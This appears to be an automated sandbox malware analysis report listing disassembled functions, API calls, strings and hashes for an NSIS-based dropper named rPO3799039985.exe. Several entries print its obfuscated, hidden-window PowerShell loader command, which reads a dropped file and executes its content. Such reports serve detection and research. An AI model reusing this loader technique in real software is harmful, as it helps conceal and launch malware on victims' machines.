                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rPO3799039985.exe,00000400), ref: 00402C93
                                                                                                                                                                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                                                                                                                          • Inst, xrefs: 00402D4B
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 00402C66
                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                                          • Null, xrefs: 00402D5D
                                                                                                                                                                                                          • soft, xrefs: 00402D54
                                                                                                                                                                                                          • C:\Users\user\Desktop\rPO3799039985.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                                                                                                                          • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rPO3799039985.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                          • API String ID: 4283519449-3484894894
                                                                                                                                                                                                          • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                                                                                                          • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                                                                                                                                                          Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 485 401751-401774 call 402a3a call 40580e 490 401776-40177c call 405d2f 485->490 491 40177e-401790 call 405d2f call 4057a1 lstrcatA 485->491 497 401795-40179b call 405f9a 490->497 491->497 501 4017a0-4017a4 497->501 502 4017a6-4017b0 call 406033 501->502 503 4017d7-4017da 501->503 511 4017c2-4017d4 502->511 512 4017b2-4017c0 CompareFileTime 502->512 505 4017e2-4017fe call 4059a2 503->505 506 4017dc-4017dd call 40597d 503->506 513 401800-401803 505->513 514 401876-40189f call 404f48 call 402e9f 505->514 506->505 511->503 512->511 515 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 513->515 516 401858-401862 call 404f48 513->516 528 4018a1-4018a5 514->528 529 4018a7-4018b3 SetFileTime 514->529 515->501 549 40184d-40184e 515->549 526 40186b-401871 516->526 530 4028d8 526->530 528->529 532 4018b9-4018c4 CloseHandle 528->532 529->532 536 4028da-4028de 530->536 534 4018ca-4018cd 532->534 535 4028cf-4028d2 532->535 538 4018e2-4018e5 call 405d51 534->538 539 4018cf-4018e0 call 405d51 lstrcatA 534->539 535->530 544 4018ea-402273 call 405525 538->544 539->544 544->535 544->536 549->526 551 401850-401851 549->551 551->516
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),00000000,00000000,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Snik Setup,NSIS Error), ref: 00405D3C
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
                                                                                                                                                                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 0040177E
                                                                                                                                                                                                          • powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
                                                                                                                                                                                                          • powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 00401805, 00401811, 00401829
                                                                                                                                                                                                          • C:\Users\user\Pictures\spikenard\Fortrds112.dll, xrefs: 0040181E, 0040183A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\Pictures\spikenard\Fortrds112.dll$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 1941528284-2913473020
                                                                                                                                                                                                          • Opcode ID: 8e2d62e47d2b72436ba3909645e11aea5521aa9bd9be8d52c1acf3c49aeb8e71
                                                                                                                                                                                                          • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2d62e47d2b72436ba3909645e11aea5521aa9bd9be8d52c1acf3c49aeb8e71
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                                                                                                                                                          Function 00404F48 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 552 404f48-404f5d 553 405013-405017 552->553 554 404f63-404f75 552->554 555 404f80-404f8c lstrlenA 554->555 556 404f77-404f7b call 405d51 554->556 558 404fa9-404fad 555->558 559 404f8e-404f9e lstrlenA 555->559 556->555 561 404fbc-404fc0 558->561 562 404faf-404fb6 SetWindowTextA 558->562 559->553 560 404fa0-404fa4 lstrcatA 559->560 560->558 563 404fc2-405004 SendMessageA * 3 561->563 564 405006-405008 561->564 562->561 563->564 564->553 565 40500a-40500d 564->565 565->553
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                                          • lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
                                                                                                                                                                                                          • SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                          • String ID: Completed
                                                                                                                                                                                                          • API String ID: 2531174081-3087654605
                                                                                                                                                                                                          • Opcode ID: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
                                                                                                                                                                                                          • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                                                                                                                                          Function 00402E9F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 566 402e9f-402eb3 567 402eb5 566->567 568 402ebc-402ec5 566->568 567->568 569 402ec7 568->569 570 402ece-402ed3 568->570 569->570 571 402ee3-402ef0 call 4030b1 570->571 572 402ed5-402ede call 4030c7 570->572 576 402ef6-402efa 571->576 577 40309f 571->577 572->571 578 402f00-402f49 GetTickCount 576->578 579 40304a-40304c 576->579 580 4030a1-4030a2 577->580 581 4030a7 578->581 582 402f4f-402f57 578->582 584 40308c-40308f 579->584 585 40304e-403051 579->585 583 4030aa-4030ae 580->583 581->583 586 402f59 582->586 587 402f5c-402f6a call 4030b1 582->587 588 403091 584->588 589 403094-40309d call 4030b1 584->589 585->581 590 403053 585->590 586->587 587->577 599 402f70-402f79 587->599 588->589 589->577 600 4030a4 589->600 593 403056-40305c 590->593 594 403060-40306e call 4030b1 593->594 595 40305e 593->595 594->577 603 403070-40307c call 405a49 594->603 595->594 602 402f7f-402f9f call 4061ab 599->602 600->581 608 403042-403044 602->608 609 402fa5-402fb8 GetTickCount 602->609 610 403046-403048 603->610 611 40307e-403088 603->611 608->580 612 402fba-402fc2 609->612 613 402ffd-402fff 609->613 610->580 611->593 616 40308a 611->616 617 402fc4-402fc8 612->617 618 402fca-402ff5 MulDiv wsprintfA call 404f48 612->618 614 403001-403005 613->614 615 403036-40303a 613->615 619 403007-40300e call 405a49 614->619 620 40301c-403027 614->620 615->582 621 403040 615->621 616->581 617->613 617->618 625 402ffa 618->625 626 403013-403015 619->626 624 40302a-40302e 620->624 621->581 624->602 627 403034 624->627 625->613 626->610 628 403017-40301a 626->628 627->581 628->624
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                          • String ID: DA$ DA$... %d%%
                                                                                                                                                                                                          • API String ID: 551687249-812340929
                                                                                                                                                                                                          • Opcode ID: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                                                                                                                                                                          • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                                                                                                                                                          Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 629 40605a-40607a GetSystemDirectoryA 630 40607c 629->630 631 40607e-406080 629->631 630->631 632 406090-406092 631->632 633 406082-40608a 631->633 635 406093-4060c5 wsprintfA LoadLibraryExA 632->635 633->632 634 40608c-40608e 633->634 634->635
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 004060AA
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                          • API String ID: 2200240437-4240819195
                                                                                                                                                                                                          • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                                          • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                                                                                                                                                                          Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 636 401f90-401f9c 637 401fa2-401fb8 call 402a3a * 2 636->637 638 402057-402059 636->638 647 401fc7-401fd5 LoadLibraryExA 637->647 648 401fba-401fc5 GetModuleHandleA 637->648 640 4021c4-4021c9 call 401423 638->640 645 4028cf-4028de 640->645 650 401fd7-401fe4 GetProcAddress 647->650 651 402050-402052 647->651 648->647 648->650 653 402023-402028 call 404f48 650->653 654 401fe6-401fec 650->654 651->640 658 40202d-402030 653->658 656 402005-402021 654->656 657 401fee-401ffa call 401423 654->657 656->658 657->658 667 401ffc-402003 657->667 658->645 661 402036-40203e call 40364f 658->661 661->645 666 402044-40204b FreeLibrary 661->666 666->645 667->658
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
                                                                                                                                                                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040200F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                          • String ID: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 2987980305-1576824727
                                                                                                                                                                                                          • Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                                                                                                                                                          • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                                                                                                                          Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 668 4059d1-4059db 669 4059dc-405a07 GetTickCount GetTempFileNameA 668->669 670 405a16-405a18 669->670 671 405a09-405a0b 669->671 673 405a10-405a13 670->673 671->669 672 405a0d 671->672 672->673
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                                                                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 004059D1
                                                                                                                                                                                                          • nsa, xrefs: 004059DC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
